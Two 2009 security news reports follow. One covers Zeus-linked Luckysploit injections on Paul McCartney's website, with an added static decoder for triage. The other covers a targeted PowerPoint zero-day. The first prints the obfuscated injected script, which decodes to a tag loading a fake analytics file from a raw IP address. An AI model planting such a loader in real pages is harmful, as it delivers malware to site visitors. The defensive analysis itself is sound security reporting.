The website of famed singer Paul McCartney is the latest victim in a string of website compromises involving the Luckysploit exploit toolkit. The compromises are related to an outbreak of bank-related data theft trojans during the first quarter of 2009. These outbreaks track back to the Zeus botnet, which was implicated in a $6 million commercial account heist on 20 European banks in the summer of 2008.
As far as exploit toolkits go, Luckysploit is a bit unusual inasmuch as it uses an asymmetric key algorithm (standard RSA public/private key cryptography) to encrypt the communication session with the browser.
Zeus bots are known for browser traffic sniffing, intercepting POST data and keystrokes associated with the active browser session as well as clipboard data pasted into the browser. While these actions facilitate Zeus’ banking theft, they can also lead to the compromise of FTP credentials. For this reason, impacted sites may not just be spreading new Zeus banking trojans and bots; their management systems may also be infected with previous variants of Zeus bots and banking trojans.
Embedded scripts on impacted pages may appear as follows:
var source = "=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?";
var result = "";
// shift every character code down by one to recover the hidden markup, then write it into the page
for (var i = 0; i < source.length; i++) result += String.fromCharCode(source.charCodeAt(i) - 1);
document.write(result);
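The snippet above can be decoded statically rather than by letting document.write() run it. The following is an added example (not code from the ScanSafe post): it reverses the one-character shift, pulls out any script src it hides, and applies one triage heuristic, flagging a script that borrows the google-analytics/ga.js name but is served from a bare IPv4 literal. The regexes and the function names are this example's own.

```javascript
// Added example: decode the charCode-shift obfuscation quoted on the page and
// inspect the result without executing it. OBFUSCATED is the string from the
// injected script; the -1 shift matches that script's decoder loop.
const OBFUSCATED =
  '=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?';

// Reverse the obfuscation: every code unit was shifted by one, so decoding is
// the same per-character shift applied in the other direction.
function decodeShifted(source, shift = -1) {
  let out = '';
  for (let i = 0; i < source.length; i++) {
    out += String.fromCharCode(source.charCodeAt(i) + shift);
  }
  return out;
}

// Collect the src attribute of every <script> tag in the decoded markup.
function extractScriptSrcs(html) {
  const re = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["'][^>]*>/gi;
  const srcs = [];
  let m;
  while ((m = re.exec(html)) !== null) srcs.push(m[1]);
  return srcs;
}

// Triage heuristic (this example's own): a script named like Google Analytics
// but loaded from a raw IP address is a lookalike, not the real library.
function assessScriptSrc(src) {
  let url;
  try { url = new URL(src); } catch (e) { return { src, suspicious: true, reason: 'unparseable URL' }; }
  const ipLiteral = /^\d{1,3}(\.\d{1,3}){3}$/.test(url.hostname);
  const mimicsAnalytics = /google-analytics|\/ga\.js$/i.test(url.pathname);
  const suspicious = ipLiteral && mimicsAnalytics;
  return {
    src,
    host: url.hostname,
    suspicious,
    reason: suspicious ? 'analytics lookalike served from raw IP' : 'no match',
  };
}

// Decode, then report every referenced script with its assessment.
function triage(obfuscated) {
  const decoded = decodeShifted(obfuscated);
  return { decoded, findings: extractScriptSrcs(decoded).map(assessScriptSrc) };
}

console.log(JSON.stringify(triage(OBFUSCATED), null, 2));
```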
Compromises have also been observed on flat HTML-only sites, furthering the likelihood that compromised FTP credentials may be the cause. As with most malware today, symptoms of a Zeus infection include the disabling of firewall or other security software. Zeus bots and trojans are also rootkit-enabled, which may hamper discovery efforts.
Credit: Mary Landesman, ScanSafe Blog
Rigged PowerPoint files are being used to exploit an unpatched vulnerability in Microsoft’s presentation software, according to a warning late Thursday from Microsoft, which has confirmed that hackers are using the flaw to attack vulnerable systems.
The attacks rely on tricking prospective marks into opening a maliciously crafted PowerPoint file, either hosted on a website or sent via email. In both scenarios users would have to open a booby-trapped PowerPoint designed to exploit the vulnerability.
In a statement published on Thursday, Microsoft said it was “aware only of limited and targeted attacks that attempt to use this vulnerability”.
Net security firm McAfee said it has “discovered multiple attacks in the field using the PowerPoint exploit” to install Trojans onto vulnerable systems. Hackers have crafted these exploits in an attempt to disguise their malign actions, it adds. “Some of these specially crafted exploits arrived as PowerPoint Show files with the ‘.pps’ extension,” McAfee reports. “Such files typically open in full screen mode and hide the applications running on the desktop, such as system monitoring tools that could give any clue to the dodgy installation of Trojans to the victim.”
Affected software packages include fully patched versions of Microsoft Office PowerPoint 2000, PowerPoint 2002, PowerPoint 2003 and Microsoft Office 2004 for Mac. Other versions including Microsoft Office PowerPoint 2007 and Microsoft Office 2008 for Mac are in the clear.
Microsoft said it was investigating the problem, something that normally results in a patch. The next scheduled Patch Tuesday falls on 14 April, but the necessary update may or may not be ready in time. Microsoft has to find time to develop and test a patch, the particular technical difficulty of which remains unclear and perhaps unknowable outside Redmond.
Microsoft holds back details of flaws until patches become available and has activated its security incident response process, which includes collaboration with anti-malware partners and internal efforts to identify the buggy portions of the code. Once the process is complete, the company will issue a bulletin with patches.
In the meantime, Microsoft recommends that Office users avoid opening or saving files, even from trusted sources because those could be spoofed. PowerPoint users should consider implementing MOICE (http://support.microsoft.com/kb/935865), a tool that uses the 2007 Microsoft Office system converters to convert the Office binary format files into the Office Open XML format.
An unpatched Excel flaw, which has also been the subject of targeted attacks since late February, failed to appear in Microsoft’s March patch batch.
Credit: The Register